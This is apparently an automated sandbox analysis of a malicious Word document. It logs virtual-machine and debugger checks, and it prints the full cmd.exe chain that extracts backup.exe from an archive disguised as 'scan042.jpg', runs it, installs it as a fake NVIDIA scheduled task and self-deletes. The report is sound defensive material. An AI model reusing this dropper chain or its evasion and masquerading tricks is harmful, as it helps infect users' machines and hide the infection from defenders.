Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&2848384c&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&2848384c&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\user\Desktop\backup.exe TID: 2544	Thread sleep time: -8040000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\backup.exe TID: 1264	Thread sleep time: -60000s >= -30000s			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\backup.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Queries a list of all running drivers

Show sources

Source: C:\Users\user\Desktop\backup.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe

System information queried: KernelDebuggerInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul *.rar scan042.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul scan042.jpg backup.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\backup.exe backup.exe	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| rmdir /S /Q C:\Users\user~1\AppData\Local\NVIDIA~1	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| del /F /Q C:\Users\user~1\Desktop\backup.exe	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe
Source: unknown	Process created: C:\Users\user\Desktop\backup.exe backup.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\backup.exe backup.exe	Jump to behavior

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
22:28:20	API Interceptor	9563x Sleep call for process: WINWORD.EXE modified
22:28:25	API Interceptor	1x Sleep call for process: Rar.exe modified
22:28:31	API Interceptor	164x Sleep call for process: backup.exe modified
22:28:44	Task Scheduler	Run new task: NVIDIAControlPanel path: C:\Users\user~1\AppData\Local\NVIDIA~1\NVIDIAControlPanel.exe
22:28:52	API Interceptor	2x Sleep call for process: cmd.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7x64_1

WINWORD.EXE (PID: 1300 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\22.docx MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2540 cmdline: C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

Rar.exe (PID: 796 cmdline: rar.exe e -o+ -r -inul *.rar scan042.jpg MD5: 33A75BFB1B9038899B9BA5E2A06D5D57)

Rar.exe (PID: 1508 cmdline: rar.exe e -o+ -r -inul scan042.jpg backup.exe MD5: 33A75BFB1B9038899B9BA5E2A06D5D57)

backup.exe (PID: 1288 cmdline: backup.exe MD5: 1CBC626ABBE10A4FAE6ABF0F405C35E2)

cmd.exe (PID: 588 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 || rmdir /S /Q C:\Users\user~1\AppData\Local\NVIDIA~1 MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 2092 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 || del /F /Q C:\Users\user~1\Desktop\backup.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

NVIDIAControlPanel.exe (PID: 2904 cmdline: C:\Users\user~1\AppData\Local\NVIDIA~1\NVIDIAControlPanel.exe MD5: 1CBC626ABBE10A4FAE6ABF0F405C35E2)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Word8.0\ShockwaveFlashObjects.exd
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	18620
Entropy (8bit):	4.383272631093305
Encrypted:	false
MD5:	DC1B9E48C15893273E318B3294091CC1
SHA1:	8F621D0ECA04362BB6330145FA1CD84B252E7945
SHA-256:	18A48E3C51156CD725557077A0E069D439F1A317D7BA3940E455CFEDA7A5F160
SHA-512:	5E26764D11BB282693DEFA2B01B2DDBB5FF6A336EE9BF6308CE4550771B1A1343D8B28BF6E12FDBA31EEAE97CD0A93C347D319CEBFAC1C6F2DEA410C17DC33EE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E286868.png
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 1 x 2, 8-bit/color RGB, non-interlaced
Size (bytes):	107
Entropy (8bit):	4.724883458262663
Encrypted:	false
MD5:	F48F26941BDDF836EA588DAB72FF98EB
SHA1:	CA99C82F3C6799D6B7B5D5B0DFDE1AB75263516E
SHA-256:	31FC32876388644A686AF7435F422CD82DB7AF5CB81F380D3650D96EA9585430
SHA-512:	61E3BDDABC5CAF2AE5EF52498C81D26A7797D1BD87DDF9BA2FC756AA69A7A79E6A58A647FB731E7A4441B3EEA11AA83F5AB61B02CD31995C016793D3B9B0B585
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3CEBD49.png
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 2 x 3, 8-bit/color RGB, non-interlaced
Size (bytes):	110
Entropy (8bit):	4.855498366902084
Encrypted:	false
MD5:	B63F696404DE0C8E30E6F8C8FEBF8524
SHA1:	A71F52A9CDE3642FDF4B44649D4B6CAE546BA80D
SHA-256:	27140025ECE45DCF91482A0BB0324698EA64A047B00A643D5F46BDF2BC589F33
SHA-512:	FC8E1BD6D736A57711D3674F2EF8F8270826FC2EA7033F523B15DD7B5D8F2E9FAC051962F20A64CA73DA5BCC8AD492E5C2670099A15D6C700DFDBB87C85E2E1F
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F692973F.wmf
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\003"
Size (bytes):	110746
Entropy (8bit):	0.017540304290604044
Encrypted:	false
MD5:	B26FB08CB1A991E87742C0C5DFD5CAE7
SHA1:	0635815BE0E8ABA7FF3FFC015C1C7BF350FFF718
SHA-256:	C01E14430ACC82D52883FA3F180DFCD051FC20E6A37A14E5086989D848FEE2D9
SHA-512:	F7498AD4D68D897CCE8B64279C641354CAE67EDB48A57824B6B6CA7344FBF9C7C305703A2B935544CFBF6E4974F3ED0A6349F4455B157B99EF3957D1F31ACBCE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD0BB2B6.jpeg
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 503x109, frames 3
Size (bytes):	15700
Entropy (8bit):	7.937053075427853
Encrypted:	false
MD5:	3B2695C8C321439B1194874C90D2C17C
SHA1:	6513DC80B8E5463C32179EF6CB0282B7A3CD19D9
SHA-256:	289886AC9A303B7E1A6B719167AB638CF4D89E3C91FE4E1D040FCFCE9D1A2495
SHA-512:	1160FB12C8E0D2FD580F68D0A68495092447FE70BF61BA653E5303C278B6DED39BF9D8F6E46EF2B18E47358867A383F44D543FC1CE36949BA551DE1B152E9938
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{44DC0078-4C5C-4F97-8D8A-2B20DC3C184D}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	79456
Entropy (8bit):	4.0638688853706295
Encrypted:	false
MD5:	2829FF86C0AC71DB1DFBDBD2CCC152DB
SHA1:	5161FAEAC021A35E9E02FA48DC2DD4DA8071757C
SHA-256:	C569F4DF58CA25B3192AB1D45D835AA1D81B82F3882CB64CF27985936BB3F3BF
SHA-512:	C9DD5E34537CB65F5833ED3423FA31FECA38DFC725609269FC733C3C26ED3F4526731ADFD2666C64106B61589ABC5C6C12DB5E53E4A2E30C5D77ED2BC9CF91FC
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{564B0B18-3E65-4926-9AFE-73F55F2FD7DF}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B89330A7-EC62-4EDA-A949-E9B50F17E85F}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	1.4501561329367931
Encrypted:	false
MD5:	D765D51D9C33FDA9029586D7697813C0
SHA1:	A91BFEABFE575279C529F34BBAD67D0B9244A389
SHA-256:	1BE12C41AC59C232656F3ED041176FAF36BB022C334A1849E545A99CC1DB983E
SHA-512:	F8F086878CC1FF56A4BA22DDDCFEE80ACCD9C5D76226F022DA7E1E5582B2240B0062DDB386ABB267180FA6A4877A512975AB5C5B800EF852B10835CCE45A8E6F
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	5908
Entropy (8bit):	4.656948853927912
Encrypted:	false
MD5:	4A6D9ED4E2F6690F0D0D47DB51C9A6B7
SHA1:	58AD045A4C4D840C83211059E7775F454E91CD0D
SHA-256:	B63FE476D4A36671C4428029E5B1D6648F0C49E79A6630FE5103180F6364C7E2
SHA-512:	2D225C2148E8AD477AD9B896BBAA907C6AF07A38A7DAE06B99A0F8687A25115DD23023D660A4F95B703A976EA5CB751B6D247E2ECE4D37DDACF88361C5148FA2
Malicious:	false
Reputation:	low

